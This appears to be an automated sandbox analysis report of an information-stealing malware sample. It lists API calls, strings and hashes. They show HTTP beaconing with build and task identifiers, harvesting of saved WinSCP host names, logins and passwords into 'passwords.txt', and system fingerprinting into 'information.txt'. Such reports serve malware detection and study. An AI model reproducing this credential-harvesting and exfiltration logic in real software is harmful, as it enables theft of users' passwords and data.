Opcode ID: d8a11cf80fd5f667af91932e42502140a46bd9f715fd99863c18b28308b6bc58
Instruction ID: 2e9f852a615408e756f1d7d3730d5668bfc6bf7d6dc94c0724fe4efb67adb4f0
Opcode Fuzzy Hash: d8a11cf80fd5f667af91932e42502140a46bd9f715fd99863c18b28308b6bc58
Instruction Fuzzy Hash: 6FA17572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99

Function 00406BB5 Relevance: 63.6, APIs: 20, Strings: 16, Instructions: 598
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
StrCmpCA.SHLWAPI(?), ref: 00406C72
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
lstrlenA.KERNEL32(?,",status,00437998,------,0043798C,",task_id,00437978,------,0043796C,",mode,00437958,------,0043794C), ref: 0040753C
lstrlenA.KERNEL32(?), ref: 0040754B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
HeapAlloc.KERNEL32(00000000), ref: 0040755D
lstrlenA.KERNEL32(?), ref: 0040756A
_memmove.LIBCMT ref: 00407578
lstrlenA.KERNEL32(?), ref: 00407586
lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
_memmove.LIBCMT ref: 004075A1
lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
InternetCloseHandle.WININET(00000000), ref: 0040762C
InternetCloseHandle.WININET(?), ref: 00407638
InternetCloseHandle.WININET(?), ref: 00407644
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

", xrefs: 004070C1
", xrefs: 0040721D
status, xrefs: 004074B1
", xrefs: 0040737D
", xrefs: 004074DD
------, xrefs: 00406CFC
task_id, xrefs: 00407351
------, xrefs: 004073FF
------, xrefs: 0040729F
mode, xrefs: 004071F1
build_id, xrefs: 00407095
------, xrefs: 00407145
------, xrefs: 00406E82
------, xrefs: 00406FE3
", xrefs: 00406F61
b26735cbe8ca9e75712ffe3aa40c4a60, xrefs: 004070ED

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$"$"$------$------$------$------$------$------$b26735cbe8ca9e75712ffe3aa40c4a60$build_id$mode$status$task_id
API String ID: 3702379033-383253102
Opcode ID: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
Instruction ID: f28151e3697947f206a0980c25f575650e410a772d733d80a29dba40e216d304
Opcode Fuzzy Hash: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
Instruction Fuzzy Hash: 7552897194016D9ACF61EB62CD46BCCB3B5AF04308F4184E7A51D73161DA746FCA8FA8

Function 00405F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
StrCmpCA.SHLWAPI(?), ref: 00405FF6
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,b26735cbe8ca9e75712ffe3aa40c4a60,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
lstrlenA.KERNEL32(?), ref: 0040660C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
HeapAlloc.KERNEL32(00000000), ref: 0040661E
lstrlenA.KERNEL32(?), ref: 0040662B
_memmove.LIBCMT ref: 00406639
lstrlenA.KERNEL32(?), ref: 00406647
lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
_memmove.LIBCMT ref: 00406662
lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
InternetCloseHandle.WININET(00000000), ref: 004066ED
InternetCloseHandle.WININET(?), ref: 004066F9
InternetCloseHandle.WININET(?), ref: 00406705
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

------, xrefs: 00406206
", xrefs: 00406445
------, xrefs: 004064C9
", xrefs: 004065A1
------, xrefs: 00406080
build_id, xrefs: 00406419
b26735cbe8ca9e75712ffe3aa40c4a60, xrefs: 00406471
mode, xrefs: 00406575
", xrefs: 004062E5
------, xrefs: 00406367

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$------$------$------$------$b26735cbe8ca9e75712ffe3aa40c4a60$build_id$mode
API String ID: 3702379033-2549312558
Opcode ID: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
Instruction ID: 82dd920f4857eb4424cccb8e833476094bcda5e32b3baf042c939ae059a0737f
Opcode Fuzzy Hash: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
Instruction Fuzzy Hash: FF22B9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8

Function 0040E186 Relevance: 51.1, APIs: 15, Strings: 14, Instructions: 325
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040E1B7
_memset.LIBCMT ref: 0040E1D7
_memset.LIBCMT ref: 0040E1E8
_memset.LIBCMT ref: 0040E1F9
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9

Strings

Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E20B
Security, xrefs: 0040E253
:22, xrefs: 0040E42D
Soft: WinSCP, xrefs: 0040E2FE
Password: , xrefs: 0040E529
passwords.txt, xrefs: 0040E662
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E2B3
HostName, xrefs: 0040E367
Password, xrefs: 0040E515
PortNumber, xrefs: 0040E3BD
Host: , xrefs: 0040E32A
UseMasterPassword, xrefs: 0040E24E
UserName, xrefs: 0040E496
Login: , xrefs: 0040E459

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$Value$Open$Enum
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 3303087153-2798830873
Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5

Function 00418643 Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00418684
GetProcAddress.KERNEL32 ref: 0041869B
GetProcAddress.KERNEL32 ref: 004186B2
GetProcAddress.KERNEL32 ref: 004186C9
GetProcAddress.KERNEL32 ref: 004186E0
GetProcAddress.KERNEL32 ref: 004186F7
GetProcAddress.KERNEL32 ref: 0041870E
GetProcAddress.KERNEL32 ref: 00418725
GetProcAddress.KERNEL32 ref: 0041873C
GetProcAddress.KERNEL32 ref: 00418753
GetProcAddress.KERNEL32 ref: 0041876A
GetProcAddress.KERNEL32 ref: 00418781
GetProcAddress.KERNEL32 ref: 00418798
GetProcAddress.KERNEL32 ref: 004187AF
GetProcAddress.KERNEL32 ref: 004187C6
GetProcAddress.KERNEL32 ref: 004187DD
GetProcAddress.KERNEL32 ref: 004187F4
GetProcAddress.KERNEL32 ref: 0041880B
GetProcAddress.KERNEL32 ref: 00418822
GetProcAddress.KERNEL32 ref: 00418839
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
GetProcAddress.KERNEL32(76850000,004184C2), ref: 004188AA
GetProcAddress.KERNEL32(77040000,004184C2), ref: 004188C5
GetProcAddress.KERNEL32 ref: 004188DC
GetProcAddress.KERNEL32(75A10000,004184C2), ref: 004188F7
GetProcAddress.KERNEL32(75690000,004184C2), ref: 00418912
GetProcAddress.KERNEL32(776F0000,004184C2), ref: 0041892D
GetProcAddress.KERNEL32 ref: 00418944

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55

Function 00413B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16

Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71

GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB

Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E

Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B

Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
Part of subcall function 00411807: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
Part of subcall function 00411997: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB

Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF

Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D

Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6

Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB

Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC

Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A

Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9

Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D

Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

VideoCard: , xrefs: 004143B7
HWID: , xrefs: 00413D4E
[Software], xrefs: 004144A3
Date: , xrefs: 00413C1F
Install Date: , xrefs: 00413ED1
Local Time: , xrefs: 0041414B
Display Resolution: , xrefs: 0041406F
GUID: , xrefs: 00413CE1
information.txt, xrefs: 00414573
[Hardware], xrefs: 0041420D
Keyboard Languages: , xrefs: 004140DE
Work Dir: In memory, xrefs: 00413E30
Cores: , xrefs: 0041428E
Processor: , xrefs: 0041422D
Path: , xrefs: 00413DBB
RAM: , xrefs: 00414350
User Name: , xrefs: 0041400E
Version: , xrefs: 00413B9F
AV: , xrefs: 00413F3E
Threads: , xrefs: 004142EF
[Processes], xrefs: 0041442A
